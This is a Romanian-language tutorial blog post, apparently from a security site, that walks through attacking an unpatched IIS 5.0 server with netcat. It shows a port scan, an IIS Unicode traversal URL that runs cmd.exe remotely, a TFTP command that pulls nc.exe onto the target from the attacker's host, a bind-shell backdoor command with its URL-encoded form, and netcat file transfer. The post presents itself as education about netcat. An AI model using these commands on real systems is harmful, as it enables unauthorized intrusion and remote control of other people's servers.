Netcat si securitatea - Securitatea Informatica

Netcat si securitatea

Netcat este un utilitar care este capabil să scrie şi să citească date din conexiuni TCP şi UDP. Dacă sunteţi responsabil pentru sistemul de securitate sau de reţea, atunci este esenţial sa înţelegeti avantajele netcat. Netcat poate fi folosit ca scaner de porturi, ca backdoor, ca redirector de porturi, etc. In acest tutorial voi demonstra un “hack”, folosind doar netcat.

Scanare porturi cu netcat
Un exemplu de scanare este “nc -v -w 2 -z target 20-30″.  Netcat va încerca să se conecteze la fiecare port între 20 şi 30 [inclusiv] de pe masina “target” şi probabil vă va informa cu privire la un server FTP (port 21), server telnet (23), sau mailer (25). Pentru a limita viteza de scanare se va introduce o întârziere între fiecare scanare de port.  Chiar dacă netcat poate fi folosit pentru scanarea de porturi, un instrument cum ar fi Nmap este mai potrivit pentru scanarea porturilor.

Am scanat 192.168.1.1, porturile 100-200. Putem vedea că, printre altele, portul 80, 21 şi 25 sunt deschise.

Identificarea serviciilor cu netcat
Deci, suntem interesaţi sa ştim ce rulează în spatele portul 80 şi 21. Putem folosi netcat pentru a afla în felul următor:

Deci, ştim că este, probabil, o maşină Windows 2000, deoarece ruleaza IIS 5.0 şi Microsoft FTP Service.

Să încercăm să trimitem un URL malformat care încearcă să exploateze vulnerabilitatea de traversare a fisierelor în servere unpatched IIS (Pre SP3). Vom verifica vulnerabilitatea cu netcat şi dacă este găsita, vom încărca cu netcat pe serverul IIS şi vom demonstra modul în care putem folosi netcat ca un backdoor.

Dacă nu ştiţi ce este vulnerabilitatea de traversare a fisierelor Unicode, puteţi cauta pe net “IIS Unicode File Traversal”. Practic aceasta vulnerabilitate ne permite să “iesim” din directorul inetpub\wwwroot şi sa exploram fisiere oriunde pe masina atacata.
Scopul aici nu este spargerea unui server IIS, ci utilizarea netcat ca un backdoor.

Am trimis adresa URL: http://192.168.1.90/scripts/ ..% 255c../winnt/system32/cmd.exe?/c+dir+c:\ La serverul IIS vulnerabil şi ceea ce vedem este o listare de directore a unităţii C:. Tare! Acum vrem să încărcam netcat pe serverul IIS, asa ca vom folosi TFTP.

tftp-I 192.168.1.9 GET nc.exe
De asemenea, se verifica server-ul dvs. TFTP, pentru a vedea dacă acesta a fost încărcat cu succes fişierul nc.exe:

Netcat ca un backdoor
Deci, acum avem netcat încărcat pe serverul IIS si vrem să-l folosim pentru a crea un backdoor, pentru a obţine un remote shell. Pentru a acţiona ca un backdoor avem nevoie de netcat sa asculte pe un port ales de pe serverul IIS (vă permite să alegeţi portul 10001) si apoi ne putem conecta la acest port de la maşina noastra … folosind netcat, desigur!
Comanda de pe server arata astfel:
nc -L -p 10001 -d -e cmd.exe
Si iată ce face comanda:
nc ruleaza fişierul nc.exe cu următoarele argumente:
-L spune să aştepte pentru conexiuni
-p specifică un port pentru a asculta
-d se detaşeaza de la proces
-e spune ce program sa ruleze cand cineva se conecteaza la portul specificat(cmd.exe)
Dacă acum doriţi să faceţi conversia aceastei comenzi pentru URL Unicode, va arata astfel:

/c+nc+-L+-p+10001+-d+-e+cmd.exe

Acum, vom executa netcat pe masina IIS:

Acum netcat ar trebui să înceapa sa asculte pe portul 10001, pe masina IIS şi ar trebui să conecteze procesul cmd.exe la fluxul de conexiune. Vom încerca să ne conectam la netcat pe server IIS.

Avem acum un “remote shell” folosind netcat. Am efectuat o comandă de la distanţă pe serverul IIS, cum se poate observa din ipconfig.

Transferarea fişierelor utilizând netcat
Să ne uităm la alte posibilităţi pe care netcat le poate oferi. Vrem sa transferam un fişier numit hack.txt la serverul IIS, şi din anumite motive nu vrem să flolosim TFTP. Putem folosi netcat pentru a transfera fişiere de la un sistem la altul.

nc -l -p 1234 > hack.txt

Pentru a primi un fişier numit hack.txt folosind netcat, pe serverul IIS, rulam următoarea comandă:
nc destinatie 1234 < hack.txt

Asiguraţi-vă că fişierul este de aceeaşi mărime ca şi originalul. Asa arata hack.txt:

Şi …

Putem vedea că fişierul a fost transferat pe sistemul ţintă, prin portul 1234.

Acestea sunt doar câteva dintre opţiunile pe care netcat le are de oferit.

Twitter Digg Delicious Stumbleupon Technorati Facebook


Nici un comentariu inca... Fii primul care lasa un comentariu!

Lasa un raspuns

This site is protected by Comment SPAM Wiper. This site is protected by WP-CopyRightPro